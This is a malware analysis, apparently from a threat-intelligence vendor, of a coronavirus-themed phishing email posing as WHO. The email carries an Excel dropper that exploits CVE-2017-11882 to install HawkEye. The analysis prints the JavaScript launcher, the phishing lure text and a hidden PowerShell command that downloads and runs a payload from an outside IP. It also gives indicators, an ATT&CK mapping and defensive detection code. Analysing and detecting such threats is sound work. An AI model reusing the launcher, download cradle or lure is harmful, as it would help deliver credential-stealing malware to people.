  6.   To follow the Respiratory and Hand Hygiene. If any sick persons are from shore all the crew are to adviced to maintain 6 feet gap. If they are coughing, they may be given a mask during their work on board and restrict their entry into the ship.
  7.   All shore visitors are to be entertained at the meeting room only.
  8.   To avoid non-essential visitors to the ship.
  9.   To keep record of all the international visitors, owners at Port for survey, audit, repairs or any other activities etc. as per the IHR-2005 2019-nCoV form.
  10.   Keep track of the latest developments on the disease from WHO weblink given above.

11 find attached file of most recent feared contaminated vessell and report to yard authority

 

Best Regards

Ms Monika Kosinska

Program Manager, Governance for Health

Division of Policy and Governance for Health and Well-being

WHO Regional Office for Europe

UN City, Marmorvej 51

DK-2100 Copenhagen, Denmark

Tel.: +45 39 17 1509

Fax: +45 39 17 18 60

E-mail: eurohealthycities@who.int <mailto:eurohealthycities@who.int>

Figure 1 – Email content

The email carries a malicious macro-enabled document, as shown in the table below.

| File Name | SHA256 | Size |
| --- | --- | --- |
| CORONA VIRUS AFFECTED CREW AND VESSEL.xlsm | 17161e0ab3907f637c2202a384de67fca49171c79b1b24db7c78a4680637e3d5 | 55377 bytes |

Table 1 – File attachment

Once opened, the document displays a generic lure claiming that the document's cells are locked and asking the victim to click the "Enable" button. As soon as the victim enables the content, the macro runs and leverages CVE-2017-11882, a memory corruption vulnerability in the Microsoft Equation Editor (EQNEDT32.EXE), the component responsible for inserting and editing Object Linking and Embedding (OLE) objects.

The vulnerability allows the attacker to achieve remote code execution in the context of the current user.

Macro Analysis

Following the successful exploitation, the macro that is embedded as an OLE object is executed and drops two files to the %temp% directory.

| File Name | SHA256 | Size |
| --- | --- | --- |
| y.js | 308DE377124F0CB24CE0928E8BFD32AD4A644BA0F804C9B5D9C8D0A2B8E424E1 | 527 bytes |
| xx.vbs | 223cfde70369bc710918cbc0573ef8381e40af3fb0d8ee6282bfa2a78b9aeaed | 9450 bytes |

Table 2 – Files list

y.js is executed using the following command line:

```
cmd /c ren %tmp%\yy y.js&cscript %tmp%\y.js
```

This script acts as a launcher: it renames the second dropped file to xx.vbs, runs it (xx.vbs is the main downloader) and then deletes itself:

```javascript
// y.js launcher as dropped by the macro (closing brace of ChangeFileName restored)
var objshell = new ActiveXObject("Wscript.Shell");
var strfolderpath = objshell.ExpandEnvironmentStrings("%temp%");

function ChangeFileName()
{
    var fso, f;
    fso = new ActiveXObject("Scripting.FileSystemObject");
    f = fso.GetFile(strfolderpath + "\\" + "xx");
    f.name = "xx.vbs";   // give the dropped file a .vbs extension so cscript runs it as VBScript
}

ChangeFileName();
// launch the main downloader through cmd.exe
var r = new ActiveXObject("WScript.Shell").Run("cmd /c cscript " + strfolderpath + "\\" + "xx.vbs");
// remove the launcher from %temp%
var rr = new ActiveXObject("Scripting.FileSystemObject");
rr.DeleteFile(strfolderpath + "\\" + "y.js");
```

xx.vbs is heavily obfuscated in an attempt to evade detection and hinder analysis. The script first sets two random-looking variables:

```vb
fsdfdsfs = "aHR0cDovLzE5Mi4zLjMxLjIxMi9BTUFOSUNSWVBURUQuZXhl"
yulkytjtrhtjrkdsarjky ="c3ZjaG9zdC5leGU="
```

Both values are base64 strings; decoded, the first is the payload URL and the second the file name the payload will be saved under:

http://192.3.31.212/AMANICRYPTED.exe

svchost.exe
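As an added example (not code from the original post or from Cyberint), the following Python pulls base64-looking string literals out of a VBS downloader such as xx.vbs and decodes them, so the download URL and drop-file name surface without stepping through the junk code. The sample script text is constructed from the two assignments shown above plus padding lines; the regex, function and variable names are assumptions of this example.

```python
import base64
import re

# Any string assignment whose literal uses only the base64 alphabet (8+ chars, optional padding).
ASSIGN_RE = re.compile(r'\b(\w+)\s*=\s*"([A-Za-z0-9+/]{8,}={0,2})"')
URL_RE = re.compile(r'https?://[^\s\'"]+', re.I)
FILE_RE = re.compile(r'[\w.-]+\.(?:exe|dll|scr|vbs|js|ps1)', re.I)

# Constructed stand-in for the obfuscated xx.vbs: the two real assignments from
# the analysis above, surrounded by junk lines of the kind the script is padded with.
SAMPLE_VBS = '''
Dim zzqw : zzqw = "AAAAAAAA"
fsdfdsfs = "aHR0cDovLzE5Mi4zLjMxLjIxMi9BTUFOSUNSWVBURUQuZXhl"
If ghjk = "Nothing to see" Then ghjk = 1
yulkytjtrhtjrkdsarjky ="c3ZjaG9zdC5leGU="
'''

def decode_b64_literals(script: str) -> dict:
    """Map variable name -> decoded text for every literal that is valid
    base64 and decodes to printable ASCII; anything else is left alone."""
    found = {}
    for name, literal in ASSIGN_RE.findall(script):
        if len(literal) % 4:            # not a whole number of base64 quanta
            continue
        try:
            text = base64.b64decode(literal, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():          # "AAAAAAAA" decodes to NUL bytes and is dropped here
            found[name] = text
    return found

def extract_iocs(script: str) -> dict:
    """Sort the decoded strings into download URLs and dropped-file names."""
    iocs = {"urls": [], "filenames": []}
    for value in decode_b64_literals(script).values():
        if URL_RE.fullmatch(value):
            iocs["urls"].append(value)
        elif FILE_RE.fullmatch(value):
            iocs["filenames"].append(value)
    return iocs

if __name__ == "__main__":
    print(extract_iocs(SAMPLE_VBS))
```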

The VBS script contains a lot of junk code. After setting up the variables and the file paths, the downloader executes the following PowerShell command (shown deobfuscated):

```powershell
PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('http://192.3.31.212/AMANICRYPTED.exe','C:\Users\admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\admin\AppData\Roaming\svchost.exe'"
```

The PowerShell command downloads a payload named AMANICRYPTED.exe from 192.3.31.212, saves it in the %AppData% directory as svchost.exe, and executes it:

| Name | SHA256 | Size |
| --- | --- | --- |
| svchost.exe | a95ad9e61847bec0e9faac52ac95e069cf6cf9583733cc10cf547060e096eb24 | 7430 bytes |

Table 3 – Payload Execution

When svchost.exe runs, it copies itself to %AppData%\Awwovi\Uopcep.exe and executes that copy. The executable is a variant of the well-known HawkEye malware, an information stealer that collects and exfiltrates browser and email client data.

Once HawkEye executes, it drops a URL shortcut

C:\Users\admin\AppData\Roaming\Awwovi\kherg.url

and sets the following registry value for persistence:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\kherg

HawkEye then spawns regasm.exe (the .NET Assembly Registration Tool) and injects its payload into that process's memory. The injected regasm.exe process first checks for internet connectivity by querying bot.whatismyipaddress.com for the external IP address of the infected system; if that succeeds, the malware connects to mail.novaa-ship.com on SMTP port 587 to exfiltrate the stolen data.
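The chain above maps directly onto host telemetry. As an added example that is not part of the original post or of Cyberint's tooling, the following Python applies process, registry and network rules derived from that chain to constructed Sysmon-style events; the event dicts, file paths and rule names are assumptions of this example, not real logs from the sample.

```python
import ntpath

SYSTEM_NAMES = {"svchost.exe", "regasm.exe", "lsass.exe", "csrss.exe"}   # expected only under C:\Windows
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
CRADLE_MARKERS = ("-w hidden", "-executionpolicy bypass", "downloadfile(", "start-process")
SMTP_PORTS = {25, 465, 587}

def _name(path: str) -> str:
    return ntpath.basename(path).lower()

def detect(events: list) -> list:
    """Return one 'RULE: target' string per rule hit, in event order; rules fire independently."""
    alerts = []
    for e in events:
        img, parent = _name(e.get("image", "")), _name(e.get("parent", ""))
        cmd = e.get("cmdline", "").lower()
        if e["type"] == "process":
            if parent == "eqnedt32.exe":            # Equation Editor spawning anything: CVE-2017-11882 signal
                alerts.append(f"EQUATION_EDITOR_CHILD: {img}")
            if parent in SCRIPT_HOSTS and img == "powershell.exe":
                alerts.append(f"SCRIPT_HOST_SPAWNS_POWERSHELL: {img}")
            if img == "powershell.exe" and all(m in cmd for m in CRADLE_MARKERS):
                alerts.append(f"HIDDEN_DOWNLOAD_CRADLE: {img}")
            if img in SYSTEM_NAMES and not e["image"].lower().startswith("c:\\windows\\"):
                alerts.append(f"SYSTEM_NAME_OUTSIDE_WINDOWS: {e['image']}")   # masquerading as svchost.exe
        elif e["type"] == "registry":
            if "\\currentversion\\runonce\\" in e["key"].lower() and "\\appdata\\" in e["image"].lower():
                alerts.append(f"RUNONCE_SET_FROM_APPDATA: {img}")
        elif e["type"] == "network":
            if img == "regasm.exe" and e["dport"] in SMTP_PORTS:            # injected host exfiltrating over SMTP
                alerts.append(f"REGASM_SMTP_CONNECTION: {img}")
    return alerts

# Constructed sample telemetry modelled on the chain above; not real sandbox output.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "cmdline": r"cmd /c ren %tmp%\yy y.js&cscript %tmp%\y.js"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\System32\cscript.exe", "cmdline": "PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command \"(New-Object System.Net.WebClient).DownloadFile('http://192.3.31.212/AMANICRYPTED.exe','C:\\Users\\admin\\AppData\\Roaming\\svchost.exe');Start-Process 'C:\\Users\\admin\\AppData\\Roaming\\svchost.exe'\""},
    {"type": "process", "image": r"C:\Users\admin\AppData\Roaming\svchost.exe", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "svchost.exe"},
    {"type": "registry", "image": r"C:\Users\admin\AppData\Roaming\Awwovi\Uopcep.exe", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\kherg"},
    {"type": "network", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe", "dport": 587},
    {"type": "process", "image": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs"},   # benign
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```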

MITRE ATT&CK™ Mapping

| Technique | Tactic | Mapped Behavior |
| --- | --- | --- |
| T1059 - Command Line Interface | Execution | EQNEDT32.EXE - Starts cmd.exe for command execution; cscript.exe - Starts cmd.exe for command execution |
| T1106 - Execution Through API | Execution | excel.exe - Application launched itself; svchost.exe - Starts itself from another location |
| T1203 - Exploitation for Client Execution | Execution | EQNEDT32.EXE - Equation Editor starts application (CVE-2017-11882) |
| T1086 - PowerShell | Execution | cscript.exe - Executes PowerShell scripts |
| T1064 - Scripting | Defense Evasion, Execution | cmd.exe - Executes scripts; cscript.exe - Executes PowerShell scripts; regasm.exe - Executes scripts |
| T1060 - Registry Run Keys / Startup Folder | Persistence | Uopcep.exe - Changes the autorun value in the registry |
| T1081 - Credentials in Files | Credential Access | vbc.exe - Actions look like stealing of personal data; vbc.exe - Stealing of credential data; vbc.exe - Uses NirSoft utilities to collect credentials |
| T1012 - Query Registry | Discovery | Uopcep.exe - Reads Internet Cache Settings; cscript.exe - Reads Internet Cache Settings; regasm.exe - Reads Environment values; svchost.exe - Reads Internet Cache Settings |
| T1082 - System Information Discovery | Discovery | regasm.exe - Reads Environment values |
| T1105 - Remote File Copy | C2, Lateral Movement | PowerShell.exe - Downloads executable files from the Internet; cscript.exe - Downloads executable files from the Internet |
| T1114 - Email Collection | Collection | vbc.exe - Stealing of credential data; vbc.exe - Uses NirSoft utilities to collect credentials |
| T1071 - Standard Application Layer Protocol | C2 | regasm.exe - Connects to SMTP port |

 

Indicators of Compromise

| Name | Type | Indicator | Classification |
| --- | --- | --- | --- |
| CORONA VIRUS AFFECTED CREW AND VESSEL.xlsm | Excel File | SHA256 - 17161e0ab3907f637c2202a384de67fca49171c79b1b24db7c78a4680637e3d5; SHA256 - ab533d6ca0c2be8860a0f7fbfc7820ffd595edc63e540ff4c5991808da6a257d | Dropper, Exploit |
| Uopcep.exe | PE | SHA256 - a95ad9e61847bec0e9faac52ac95e069cf6cf9583733cc10cf547060e096eb24 | HawkEye |
| Download IP | IP Address | 192.3.31.212 | C2, Payload Delivery |
| Download URL | URL | http://192.3.31.212/AMANICRYPTED.exe | C2, Payload Delivery |
